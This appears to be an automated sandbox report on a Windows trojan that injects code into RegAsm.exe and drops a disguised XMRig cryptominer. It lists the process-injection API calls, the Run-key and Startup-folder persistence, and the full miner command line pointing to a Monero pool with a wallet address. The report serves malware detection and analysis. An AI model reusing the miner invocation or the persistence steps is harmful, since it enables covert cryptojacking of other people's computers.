                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7456Thread sleep count: 196 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7456Thread sleep time: -196000s >= -30000sJump to behavior
                    Source: Driver.exe, 00000002.00000002.1743254277.00000000004E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW FO%SystemRoot%\system32\mswsock.dll
                    Source: Driver.exe, 00000002.00000002.1743254277.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000007.00000002.3093652919.0000000000431000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000010.00000002.3707277603.0000000000581000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000014.00000002.4118678441.0000000000421000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Driver.exe, 00000007.00000002.3093652919.0000000000431000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000010.00000002.3707277603.0000000000581000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000014.00000002.4118678441.0000000000421000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws\System32\en-US\wshqos.dll.mui
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_012132F0 LdrInitializeThunk,1_2_012132F0
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: 0_2_00FCC90D mov eax, dword ptr fs:[00000030h]0_2_00FCC90D
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: 0_2_00FC6108 mov ecx, dword ptr fs:[00000030h]0_2_00FC6108
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: 0_2_00F8E824 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F8E824
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: 0_2_001E018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_001E018D
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7FA000Jump to behavior
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7FC000Jump to behavior
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C4A008Jump to behavior
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7476 -s 764Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 476 -p 7632 -ip 7632Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7632 -s 864Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 6272 -ip 6272Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6272 -s 864Jump to behavior
                    Source: conhost.exe, 00000015.00000002.4119627710.000002845D530000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: conhost.exe, 00000015.00000002.4119627710.000002845D530000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: conhost.exe, 00000015.00000002.4119627710.000002845D530000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: conhost.exe, 00000015.00000002.4119627710.000002845D530000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00FD90B5
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00FD8C84
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,0_2_00FD8E7F
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: EnumSystemLocalesW,0_2_00FCA871
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00FD9431
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: EnumSystemLocalesW,0_2_00FD902A
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00FD9606
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: EnumSystemLocalesW,0_2_00FD8F8F
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,0_2_00FD9537
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,0_2_00FCB32D
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: EnumSystemLocalesW,0_2_00FD8F26
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,0_2_00FD9308
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: 0_2_00F8EDF4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F8EDF4

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter                    		21
                    Registry Run Keys / Startup Folder                    		412
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		21
                    Registry Run Keys / Startup Folder                    		3
                    Virtualization/Sandbox Evasion                    		LSASS Memory111
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		Security Account Manager3
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                    Process Injection                    		NTDS2
                    Process Discovery                    		Distributed Component Object ModelInput Capture1
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Software Packing                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSync22
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1479411 Sample: kWYLtJ0Cn1.exe Startdate: 23/07/2024 Architecture: WINDOWS Score: 100 53 pool.supportxmr.com 2->53 55 pool-fr.supportxmr.com 2->55 63 Sigma detected: Xmrig 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Antivirus / Scanner detection for submitted sample 2->67 69 9 other signatures 2->69 9 kWYLtJ0Cn1.exe 2->9         started        12 svchost.exe 3 6 2->12         started        14 svchost.exe 3 4 2->14         started        signatures3 process4 signatures5 71 Found strings related to Crypto-Mining 9->71 73 Contains functionality to inject code into remote processes 9->73 75 Writes to foreign memory regions 9->75 77 2 other signatures 9->77 16 RegAsm.exe 1 4 9->16         started        19 WerFault.exe 2 12->19         started        21 WerFault.exe 2 12->21         started        23 WerFault.exe 2 14->23         started        process6 file7 49 C:\Users\user\AppData\Roaming\...\Driver.exe, MS-DOS 16->49 dropped 51 C:\Users\user\AppData\Roaming\...\Driver.url, MS 16->51 dropped 25 Driver.exe 1 16->25         started        28 Driver.exe 1 16->28         started        31 Driver.exe 1 16->31         started        33 Driver.exe 1 16->33         started        process8 dnsIp9 79 Multi AV Scanner detection for dropped file 25->79 81 Detected unpacking (changes PE section rights) 25->81 83 Found strings related to Crypto-Mining 25->83 35 conhost.exe 25->35         started        37 WerFault.exe 2 25->37         started        57 pool-fr.supportxmr.com 141.94.96.195, 3333, 49730, 49741 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 28->57 39 conhost.exe 28->39         started        41 WerFault.exe 2 28->41         started        59 141.94.96.71, 3333, 49738, 49739 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 31->59 43 conhost.exe 31->43         started        45 WerFault.exe 2 31->45         started        61 141.94.96.144, 3333, 49740, 49743 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 33->61 47 conhost.exe 33->47         started        signatures10 85 Detected Stratum mining protocol 61->85 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    kWYLtJ0Cn1.exe50%ReversingLabsWin32.Trojan.Fragtor
                    kWYLtJ0Cn1.exe100%AviraHEUR/AGEN.1316902
                    kWYLtJ0Cn1.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe61%ReversingLabsWin64.Trojan.DisguisedXMRigMiner

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://xmrig.com/wizard0%Avira URL Cloudsafe
                    https://xmrig.com/wizard%s0%Avira URL Cloudsafe
                    https://xmrig.com/docs/algorithms0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    pool-fr.supportxmr.com
                    		141.94.96.195
                    		truetrue
                      		unknown
                      pool.supportxmr.com
                      		unknown
                      		unknowntrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://xmrig.com/wizardDriver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Driver.exe, 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://xmrig.com/wizard%sDriver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Driver.exe, 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://xmrig.com/docs/algorithmsDriver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Driver.exe, 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        141.94.96.195
                        		pool-fr.supportxmr.comGermany
                        		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                        141.94.96.71
                        		unknownGermany
                        		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                        141.94.96.144
                        		unknownGermany
                        		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1479411
                        Start date and time:2024-07-23 15:44:36 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 28s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:22
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:kWYLtJ0Cn1.exe
                        renamed because original name is a hash value
                        Original Sample Name:917f9d9d484f8657efc7f60b8adde947.exe
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.mine.winEXE@29/2@1/3
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: kWYLtJ0Cn1.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        09:46:07API Interceptor8071x Sleep call for process: RegAsm.exe modified
                        14:45:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\RegAsm.exe
                        14:45:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\RegAsm.exe
                        14:45:49AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        141.94.96.195http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                        • pool.supportxmr.com/favicon.ico
                        141.94.96.71h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                          http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                            http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                              01904399.dat.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                file.exeGet hashmaliciousXmrigBrowse
                                  file.exeGet hashmaliciousXmrigBrowse
                                    KMSPicoSetup.exeGet hashmaliciousXmrigBrowse
                                      target.ps1Get hashmaliciousXmrigBrowse
                                        file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                          file.exeGet hashmaliciousRHADAMANTHYS, Vidar, XmrigBrowse
                                            141.94.96.144FieroHack.exeGet hashmaliciousXmrigBrowse
                                              h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                                  curriculum_vitae-copie_(1).vbsGet hashmaliciousXmrigBrowse
                                                    curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                                      Vsob3IooE7.exeGet hashmaliciousXmrigBrowse
                                                        GameBar.exeGet hashmaliciousXmrigBrowse
                                                          FTrondtloadws.exeGet hashmaliciousXmrigBrowse
                                                            file.exeGet hashmaliciousXmrigBrowse
                                                              GoogleUpdate.exeGet hashmaliciousXmrigBrowse

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                pool-fr.supportxmr.comupdater.exeGet hashmaliciousXmrigBrowse
                                                                • 141.94.96.71
                                                                xjSglbp263.exeGet hashmaliciousXmrigBrowse
                                                                • 141.94.96.71
                                                                gwRQinPOHB.exeGet hashmaliciousXmrigBrowse
                                                                • 141.94.96.195
                                                                FieroHack.exeGet hashmaliciousXmrigBrowse
                                                                • 141.94.96.195
                                                                FieroHack.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                • 141.94.96.195
                                                                gVRqUej0ci.exeGet hashmaliciousXmrigBrowse
                                                                • 141.94.96.71
                                                                h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                • 141.94.96.144
                                                                setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                                • 141.94.96.71
                                                                SecuriteInfo.com.Win32.Evo-gen.18867.15916.exeGet hashmaliciousXmrigBrowse
                                                                • 141.94.96.71
                                                                http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                                                                • 141.94.96.71

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                DFNVereinzurFoerderungeinesDeutschenForschungsnetzeseFzfee1Lgc2.elfGet hashmaliciousUnknownBrowse
                                                                • 137.248.101.131
                                                                gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                                • 139.6.220.162
                                                                updater.exeGet hashmaliciousXmrigBrowse
                                                                • 141.94.96.195
                                                                http://nys-ns.com/Get hashmaliciousUnknownBrowse
                                                                • 141.95.124.137
                                                                http://nys-ns.com/Get hashmaliciousUnknownBrowse
                                                                • 141.95.124.137
                                                                ZPPEqPIBy7.elfGet hashmaliciousUnknownBrowse
                                                                • 130.133.207.43
                                                                D8J2VuFPRL.rtfGet hashmaliciousFormBookBrowse
                                                                • 141.95.110.31
                                                                Pn0jlaHvxE.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 141.99.20.144
                                                                1gx339YsKN.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 141.88.171.81
                                                                faBNhIKHq4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 141.89.138.130
                                                                DFNVereinzurFoerderungeinesDeutschenForschungsnetzeseFzfee1Lgc2.elfGet hashmaliciousUnknownBrowse
                                                                • 137.248.101.131
                                                                gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                                • 139.6.220.162
                                                                updater.exeGet hashmaliciousXmrigBrowse
                                                                • 141.94.96.195
                                                                http://nys-ns.com/Get hashmaliciousUnknownBrowse
                                                                • 141.95.124.137
                                                                http://nys-ns.com/Get hashmaliciousUnknownBrowse
                                                                • 141.95.124.137
                                                                ZPPEqPIBy7.elfGet hashmaliciousUnknownBrowse
                                                                • 130.133.207.43
                                                                D8J2VuFPRL.rtfGet hashmaliciousFormBookBrowse
                                                                • 141.95.110.31
                                                                Pn0jlaHvxE.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 141.99.20.144
                                                                1gx339YsKN.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 141.88.171.81
                                                                faBNhIKHq4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 141.89.138.130
                                                                DFNVereinzurFoerderungeinesDeutschenForschungsnetzeseFzfee1Lgc2.elfGet hashmaliciousUnknownBrowse
                                                                • 137.248.101.131
                                                                gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                                • 139.6.220.162
                                                                updater.exeGet hashmaliciousXmrigBrowse
                                                                • 141.94.96.195
                                                                http://nys-ns.com/Get hashmaliciousUnknownBrowse
                                                                • 141.95.124.137
                                                                http://nys-ns.com/Get hashmaliciousUnknownBrowse
                                                                • 141.95.124.137
                                                                ZPPEqPIBy7.elfGet hashmaliciousUnknownBrowse
                                                                • 130.133.207.43
                                                                D8J2VuFPRL.rtfGet hashmaliciousFormBookBrowse
                                                                • 141.95.110.31
                                                                Pn0jlaHvxE.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 141.99.20.144
                                                                1gx339YsKN.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 141.88.171.81
                                                                faBNhIKHq4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 141.89.138.130

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeh2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                  file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                    W1nnerFree CS2.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                      KRZyX0PPRm.exeGet hashmaliciousXmrigBrowse
                                                                        lO188m2RAu.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                          file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                            01904399.dat.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                              Vsob3IooE7.exeGet hashmaliciousXmrigBrowse
                                                                                ruZVRNvu0Y.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                                  file.exeGet hashmaliciousLoaderBot, XmrigBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\AppData\Roaming\Sysfiles\RegAsm.exe>), ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):179
                                                                                    Entropy (8bit):5.310768277964914
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:HRAbABGQYm5uOt+kiEaKC5SQn3gL4NvQJ4ovsty9ty8WddSWAnPL4cHEiWXU:HRYFVmwOwknaZ5l3gL49QJlvsty9LW61
                                                                                    MD5:8A7A9D74B0F86F4C475A1369279FEA2D
                                                                                    SHA1:1599024A76325836AC23AE3BE751326FF329A66B
                                                                                    SHA-256:873E3DBA7B1463B9887E8026B4B0E105AFE5A463C0D31DC83860CFBBF9D59376
                                                                                    SHA-512:0299F49EB7BACB6C3DEC6B8AC644ED5B0C6B42658E51651329F29A2289DFFA3DD5AF3414EA7F5A247794B6AC522BF9ECFC3A29B638FB4F3ACDEFA852B0BEC3C7
                                                                                    Malicious:true
                                                                                    Preview:[InternetShortcut]..URL=file:///C:\Users\user\AppData\Roaming\Sysfiles\RegAsm.exe..IconIndex=0..IconFile=C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\backup (3).ico..

                                                                                    C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:MS-DOS executable PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                    Category:dropped
                                                                                    Size (bytes):4141064
                                                                                    Entropy (8bit):5.210440836800201
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:SNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3Z:wzP88fBsnZTgOtqB3m1RC3Z
                                                                                    MD5:02569A7A91A71133D4A1023BF32AA6F4
                                                                                    SHA1:0F16BCB3F3F085D3D3BE912195558E9F9680D574
                                                                                    SHA-256:8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
                                                                                    SHA-512:534BE1FE93EE556A14CFD8FAD5377F57FB056AB4CD2BCA14E4F376F4A25D3D4D270917D68A90B3C40D8A8DAAEBA6F592FA095ECFF478332BA23405D1DF728322
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 61%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: h2UFp4aCRq.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: W1nnerFree CS2.exe, Detection: malicious, Browse
                                                                                    • Filename: KRZyX0PPRm.exe, Detection: malicious, Browse
